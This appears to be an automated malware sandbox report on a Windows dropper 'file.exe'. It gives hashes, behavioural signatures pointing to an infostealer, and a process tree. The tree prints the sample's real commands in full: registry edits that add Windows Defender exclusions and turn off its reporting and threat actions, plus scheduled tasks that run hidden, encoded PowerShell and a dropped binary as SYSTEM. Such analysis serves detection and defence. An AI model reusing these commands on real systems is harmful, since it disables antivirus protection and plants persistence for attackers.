Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231201-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231201-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2023 18:34

General

  • Target

    file.exe

  • Size

    7.3MB

  • MD5

    ff788972ab8effb3188f96fb156c0845

  • SHA1

    8d2e4abaa7b4b642e9b2de82c793009e40201709

  • SHA256

    a62731d4252f3bc01be75a4da0820cab235996110a66752102e5971929dfe814

  • SHA512

    753e7f7bce6eb06193b43b781c6ca9764b096a3bfaf750bd981a40b9c67452f58f7d274bea432350156b8988fb65f2a1366110e2d6cda9364d2f11799971aa81

  • SSDEEP

    196608:91OvTaIfLM6pcEUYYoqsA7oLNPsUs1diN91uDys4Qq:3OrUiVVqsIIagZuDU

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 29 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1352
    • C:\Users\Admin\AppData\Local\Temp\7zS490F.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4108
      • C:\Users\Admin\AppData\Local\Temp\7zS4B03.tmp\Install.exe
        .\Install.exe /ZinkDdidMQ "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2688
          • C:\Windows\SysWOW64\cmd.exe
            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3800
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
              6⤵
                PID:2972
              • \??\c:\windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                6⤵
                  PID:4532
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2612
              • C:\Windows\SysWOW64\cmd.exe
                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:852
                • \??\c:\windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                  6⤵
                    PID:3744
                  • \??\c:\windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                    6⤵
                      PID:4320
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "gcPeCjfXs" /SC once /ST 09:35:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                  4⤵
                  • Creates scheduled task(s)
                  PID:116
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /run /I /tn "gcPeCjfXs"
                  4⤵
                    PID:1288
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /DELETE /F /TN "gcPeCjfXs"
                    4⤵
                      PID:4824
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /CREATE /TN "bQrKcOXclPyMmQgfTY" /SC once /ST 18:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\MmoByBS.exe\" BX /Vtsite_idHHg 525403 /S" /V1 /F
                      4⤵
                      • Drops file in Windows directory
                      • Creates scheduled task(s)
                      PID:2384
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                1⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2616
                • C:\Windows\system32\gpupdate.exe
                  "C:\Windows\system32\gpupdate.exe" /force
                  2⤵
                    PID:3860
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                  1⤵
                    PID:452
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                    1⤵
                      PID:2236
                    • C:\Windows\system32\gpscript.exe
                      gpscript.exe /RefreshSystemParam
                      1⤵
                        PID:1936
                      • C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\MmoByBS.exe
                        C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\MmoByBS.exe BX /Vtsite_idHHg 525403 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of WriteProcessMemory
                        PID:1512
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2368
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4448
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:4608
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:4432
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:2540
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:1488
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:2488
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:3140
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:4280
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:4912
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:1072
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:5052
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:2860
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4560
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:4256
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                      3⤵
                                                        PID:2912
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:3592
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:1568
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:4504
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:920
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:4688
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:3520
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:4992
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:2356
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:1108
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:5036
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                              PID:1044
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:5000
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:1580
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:4072
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bJazgiTXFJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bJazgiTXFJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\icEyDogKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\icEyDogKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycMZCyUlVfbU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycMZCyUlVfbU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yczsUHdtPuMxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yczsUHdtPuMxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\sUklQelueKqzsVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\sUklQelueKqzsVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\szdKxxrFMiVXCdXj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\szdKxxrFMiVXCdXj\" /t REG_DWORD /d 0 /reg:64;"
                                                                                  2⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2020
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:32
                                                                                    3⤵
                                                                                      PID:4920
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:32
                                                                                        4⤵
                                                                                          PID:3128
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:8
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                            PID:3744
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:64
                                                                                            3⤵
                                                                                              PID:3720
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:1668
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                  PID:2552
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:3576
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:3912
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                        PID:2036
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
